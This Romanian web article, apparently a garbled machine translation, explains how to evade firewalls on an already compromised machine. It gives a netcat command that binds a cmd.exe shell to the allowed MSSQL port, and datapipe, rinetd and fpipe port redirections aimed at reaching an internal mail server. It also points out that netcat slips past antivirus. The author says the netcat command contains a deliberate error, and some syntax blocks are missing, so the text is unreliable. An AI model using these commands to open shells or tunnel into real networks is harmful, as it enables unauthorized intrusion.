Redirecționarea porturilor

Buna ziua, Draga cititor!

După cum știți, rețelele de calculatoare ale diferitelor întreprinderi și instituții protejează împotriva pătrunderii de pe Internet cu ajutorul unui firewall. Firewall vă permite să blocați toate pachetele pe care administratorul de rețea pentru aviz nu va fi expus la rețeaua internă ... Desigur, în firewall`ah găsi găuri și unele persoane chiar au timp pentru a profita de ele. Cu toate acestea, problema principală este, desigur, nu la software-ul neetanșe și administratorul neetanșe care nu a putut să configureze în mod corespunzător firewall-ul ...







Atenție vă rog! Toate exemplele de mai jos au câteva ipoteze. Toate acestea se fac doar pentru a arăta posibile modalități de a eluda restricțiile impuse de firewall. În plus, nu uitați că realitatea este mult mai rău ...

Imaginați-vă că blocurile de firewall toate porturile cu excepția 80, 1433. Total: ftpd și MSSQL ... Să presupunem, de asemenea, că un anumit control asupra unuia dintre mașinile într-o rețea aveți
(nu esența modului în care ați obținut-o: printr-un script neclar sau cu ajutorul unei probleme IIS). Sarcina noastră este să avem o cochilie, pentru care avem doar porturi 80 și 1433 ... OK!
Încărcăm pe acest site un netcat utilitar minunat. Cu asta, vă vom deschide shell-ul în loc de
MSSQL (deoarece traficul către portul 1433 este permis de firewall), trebuie să executați următoarea comandă:

nc -L -p 1433 -e cmd.exe IP

nc - fișier executabil netcat

  • -L-p 1433 - comandă conexiuni de intrare pe portul 1433
  • -e cmd.exe - ca răspuns la o conexiune de intrare pentru a rula shell (cmd.exe pentru NT, în * nix ar fi ceva de genul
    / bin / bash)

Doar să aibă în vedere faptul că, cu această opțiune rula moale shell numai până la următoarea repornire, astfel încât a primit coajă încerca să consolideze mai bine, dar ... știi, experiența arată că majoritatea serverelor sunt folosite pentru a reporni on-the-foarte rare.







Poate că mulți vor întreba: "De ce nu un backdoor?". - Ei bine, cel puțin pentru că software-ul antivirus nu a fost anulat încă, iar Netcat este clar în fața lor ...

Notă importantă! Porturile de mai jos 1024 poate fi utilizat doar de root, pentru că dacă sunt lipsite de o astfel de fericire, care este obiectivul dvs. - toate porturile cu un număr mai mare decât cel specificat.

O altă situație este că firewall-ul transmite traficul către porturi cu număr foarte mare. Avem unele drepturi în interiorul rețelei, dar vrem să venim din afară și să folosim serverul de mail al rețelei interne, deși în această situație putem folosi orice ;-). Vom fi ajutați în această situație printr-o operație simplă ca redirecționarea (redirecționarea) porturilor. Redirecționarea poate fi implementată cu ajutorul unui software special; principiul funcționării sale în general este după cum urmează: o conexiune de intrare este așteptată pe un anumit port și odată ce conexiunea este recepționată
îl redirecționează la portul specificat IP: (și IP-ul poate fi oricare, inclusiv 127.0.0.1). Deci, iată ce a făcut homo sapiens pentru o redirecționare:

Probabil cel mai cunoscut instrument, nee
în * nix. Varianta scrisă în C cu tine
Cu ușurință veți tăia pe un site packetstormsecurity.nl. Și ce aș spune "nee
in * nix »? Da, pentru că în timpul său X nu a trecut-o prin atenție sau mai degrabă nu a fost eludată de Cutter, care a rescris același lucru în Perl, atât sub * nix, cât și sub Windows. Această versiune puteți lua
pe site-ul nostru. Deci, rupem serverul de mail al rețelei interne. Pentru a face acest lucru, pe o mașină dedicată, rulați datapipe după cum urmează:

datapipe 65000 25 IP

Creatorul acestui instrument a definit-o drept "server de redirecționare". Care, în principiu, este foarte adevărat:
rinetd este inițiat ca un singur proces, capabil să servească un număr mare de conexiuni.
Configurația rinetd se realizează utilizând un fișier de configurare (implicit este /etc/rinetd.conf), care are următoarea structură:

După editarea fișierului config, rinetd poate fi pornit cu comanda

rinetd -c config_file

Opțiunea -c ar trebui specificată dacă locația fișierului config este diferită de cea implicită
/etc/rinetd.conf. Notă importantă! Rinetd este capabil să redirecționeze numai conexiuni care necesită un singur soclu (care nu include, de exemplu, ftp).

Foarte la îndemână instrument de redirecționare pentru Windows, foarte asemănător cu datapipe. Fpipe poate fi ridicat de la
dezvoltator de site-uri. Sintaxa programului:

În general, redirecționarea are pur și simplu cele mai largi posibilități de aplicare: de la eludarea firewall-urilor la obținerea internetului gratuit. Dar acesta este deja un subiect pentru un articol complet diferit ...

Atenție vă rog! La promptul de comandă Netcat
a făcut o greșeală specială - ia în considerare acest lucru
"Un puzzle pentru Hacker # 5" 🙂

Distribuiți acest articol cu ​​prietenii dvs.:







Articole similare

Trimiteți-le prietenilor: